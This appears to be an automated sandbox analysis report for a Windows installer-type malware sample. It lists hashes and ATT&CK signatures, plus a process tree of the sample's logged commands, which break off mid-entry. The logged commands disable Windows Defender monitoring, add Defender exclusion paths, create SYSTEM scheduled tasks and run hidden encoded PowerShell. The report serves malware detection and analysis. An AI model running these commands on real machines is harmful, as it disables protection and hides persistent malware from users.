70ad372237a5b75ba3da3cfad51bc9dfdd83fdcaa887a6ec3f9bafe313f3b26d

Analysis

max time kernel
1s
max time network
129s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
23/12/2023, 01:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe
Size

7.2MB
MD5

688b11202058af0746ee63a8462bc680
SHA1

b240b0fda2306ec3445e946669a987d8abe1ae1d
SHA256

a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae
SHA512

0f04d0e3470f9c85a07d6d6fef6876683d4fb6f1ebb17ae309a14608b74b061d757db8952ee0e00b4f76b5acf2360b6ad15b48ab2180cf794688d2077d853265
SSDEEP

196608:91O0oi5cDo8BHAFUJzcTROxtID/OxSiyt72e5Yo:3O0oi5cHAK+D/Yst5L

Score

7^/10

Malware Config

Signatures

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Executes dropped EXE 2 IoCs

pid	Process
2460	Install.exe
1684	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
2180	a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe
2460	Install.exe
2460	Install.exe
2460	Install.exe
2460	Install.exe
1684	Install.exe
1684	Install.exe
1684	Install.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2224	schtasks.exe
2320	schtasks.exe
1660	schtasks.exe
1436	schtasks.exe
920	schtasks.exe
1100	schtasks.exe
1616	schtasks.exe
240	schtasks.exe
832	schtasks.exe
2632	schtasks.exe
2080	schtasks.exe
2596	schtasks.exe
2200	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 2460	2180	a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe	28
PID 2180 wrote to memory of 2460	2180	a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe	28
PID 2180 wrote to memory of 2460	2180	a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe	28
PID 2180 wrote to memory of 2460	2180	a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe	28
PID 2180 wrote to memory of 2460	2180	a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe	28
PID 2180 wrote to memory of 2460	2180	a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe	28
PID 2180 wrote to memory of 2460	2180	a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe	28
PID 2460 wrote to memory of 1684	2460	Install.exe	40
PID 2460 wrote to memory of 1684	2460	Install.exe	40
PID 2460 wrote to memory of 1684	2460	Install.exe	40
PID 2460 wrote to memory of 1684	2460	Install.exe	40
PID 2460 wrote to memory of 1684	2460	Install.exe	40
PID 2460 wrote to memory of 1684	2460	Install.exe	40
PID 2460 wrote to memory of 1684	2460	Install.exe	40

C:\Users\Admin\AppData\Local\Temp\a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe
"C:\Users\Admin\AppData\Local\Temp\a19fb2f90c6f5ffe1d7eadb0141f5534eaf6242386e42f0cb7b005752f2bc1ae.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Users\Admin\AppData\Local\Temp\7zS1A16.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Users\Admin\AppData\Local\Temp\7zS1BDA.tmp\Install.exe
    .\Install.exe /YodidrbOvT "525403" /S
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates system info in registry
    PID:1684
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gpdlOlNwg" /SC once /ST 00:39:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1616
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gpdlOlNwg"
      4⤵
      PID:2532
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bYBcpDMdMARedSIhQq" /SC once /ST 01:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NeojRWPYjxizmjmAR\yffdxMMIukXyEmg\TfqKcjU.exe\" yF /zdsite_idwDR 525403 /S" /V1 /F
      4⤵
      Creates scheduled task(s)
      PID:2596
    - - C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        5⤵
        
        PID:2604
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gpdlOlNwg"
      4⤵
      PID:1584
    - - C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        5⤵
        
        PID:768

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
1⤵
PID:2096
- C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
  2⤵
  PID:2812
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2828

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
1⤵
PID:2696
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
  2⤵
  PID:3024
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
  2⤵
  PID:2816

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
1⤵
PID:2128

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
1⤵
PID:2728

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
1⤵
PID:2076

C:\Windows\system32\taskeng.exe
taskeng.exe {855DC075-34B5-4D1E-873C-3AE112438AC1} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
1⤵
PID:2600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:3028
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2892
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:3044
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2912
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1596

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2036

C:\Windows\system32\taskeng.exe
taskeng.exe {8B23207D-130B-49E0-A00A-822C263B74B5} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1272
- C:\Users\Admin\AppData\Local\Temp\NeojRWPYjxizmjmAR\yffdxMMIukXyEmg\TfqKcjU.exe
  C:\Users\Admin\AppData\Local\Temp\NeojRWPYjxizmjmAR\yffdxMMIukXyEmg\TfqKcjU.exe yF /zdsite_idwDR 525403 /S
  2⤵
  PID:2232
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gQovulajQ" /SC once /ST 00:09:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2200
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gQovulajQ"
    3⤵
    PID:2188
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gQovulajQ"
    3⤵
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:284
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gWwXHrBQg" /SC once /ST 00:45:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:240
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gWwXHrBQg"
    3⤵
    PID:692
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1032
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\gveukKRNIctRVHep\dzIsqlTW\fvwJJYxDIRWHcxuw.wsf"
    3⤵
    PID:2760
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UgNfYAcGU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2776
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UgNfYAcGU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\NeojRWPYjxizmjmAR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2188
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1712
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PUPRsvAPeHUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2856
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1004
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2176
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1676
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\NeojRWPYjxizmjmAR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2364
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\NeojRWPYjxizmjmAR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2376
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VoJWzcwMulMNaLVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2316
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VoJWzcwMulMNaLVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1032
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogwftffyaBTxsVUHrHR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:284
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogwftffyaBTxsVUHrHR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:776
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\faFfusCBYeOtC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3068
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\faFfusCBYeOtC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1844
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XHfvxCdEncGU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XHfvxCdEncGU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UgNfYAcGU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:560
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UgNfYAcGU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:112
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PUPRsvAPeHUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:676
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\NeojRWPYjxizmjmAR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2224
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2268
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1296
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VoJWzcwMulMNaLVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2676
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VoJWzcwMulMNaLVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1012
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogwftffyaBTxsVUHrHR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1508
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogwftffyaBTxsVUHrHR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1436
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\faFfusCBYeOtC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2464
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\faFfusCBYeOtC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2432
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XHfvxCdEncGU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2948
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XHfvxCdEncGU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1044
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PUPRsvAPeHUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2984
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PUPRsvAPeHUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2832
    - - C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
        5⤵
        
        PID:2548
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gWoNhqYJL" /SC once /ST 00:19:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2320
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gWoNhqYJL"
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\gveukKRNIctRVHep\dzIsqlTW\fvwJJYxDIRWHcxuw.wsf"
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gveukKRNIctRVHep" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gWwXHrBQg"
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gDXfFlxyjQJNdZVEp" /SC once /ST 00:03:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gveukKRNIctRVHep\opyDnPvQNZRjFLC\XyfZpvN.exe\" pi /MPsite_idfeQ 525403 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:1660
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gDXfFlxyjQJNdZVEp"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gWoNhqYJL"
    3⤵
    PID:1564
- C:\Windows\Temp\gveukKRNIctRVHep\opyDnPvQNZRjFLC\XyfZpvN.exe
  C:\Windows\Temp\gveukKRNIctRVHep\opyDnPvQNZRjFLC\XyfZpvN.exe pi /MPsite_idfeQ 525403 /S
  2⤵
  PID:3056
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "XmagKYDirZLHoXY"
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "XmagKYDirZLHoXY"
    3⤵
    PID:380
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "XmagKYDirZLHoXY2" /F /xml "C:\Program Files (x86)\UgNfYAcGU\ktNvZCX.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1436
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "oGivxxQvOpZqK2" /F /xml "C:\ProgramData\VoJWzcwMulMNaLVB\nPsjtZl.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2632
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "TgEGqhSbGBoAVt" /F /xml "C:\Program Files (x86)\XHfvxCdEncGU2\kbIBhee.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2080
- - C:\Windows\SysWOW64\schtasks.exe
